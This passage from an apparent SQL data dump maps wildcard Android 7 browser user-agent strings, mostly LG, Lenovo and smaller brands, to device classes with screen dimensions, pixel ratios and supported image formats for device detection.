Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGV34) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LIFETAB_P970X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_medion_lifetab','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LIVE 5 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LIVE_6plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LM-X210(G)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LM-X210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LM-X210APM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LM-X210CM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LM-X210CMR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LM-X210VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LM-X212(G)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LM-X410(FG)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LM-X410.F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LM-X410.FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LOGIC X5A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LOGIC_L5D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LON-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LOOK) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LT C1400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LT_S9_NOTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LeNumero1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Le_Hello) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenny4 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenny4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K3 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K31-t3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K320t) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K33a42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K33a48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K33b36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K53a48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K53b36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K8 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K8 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo K8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo P2a42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-7304F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-7304I) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-7304X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-7504X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-8304F1) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-8504F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-8504X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-8704X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-X304F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-X304F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-X304L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-X304L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-X704F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-X704L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo TB-X704L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo YB1-X90L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":686,\"screenHeight\":1097,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lenovo YT-X703F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Life 10 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Life One X3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Life Pro 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Lion_Dual) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Live) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M bot 51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M-PPxG4P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M-PPxG5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M-PPxG5M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M-PPxG7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M-PPxS5P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M-PPxS7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M-PPxS7P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M24i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M4 SS4457-R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M4 SS4458-R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M4_B2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M4_B3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M5 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M50 MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M50 STAR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M50A MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M50A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M511) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M512) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M555i) AppleWebKit/* (KHTML, like Gecko) 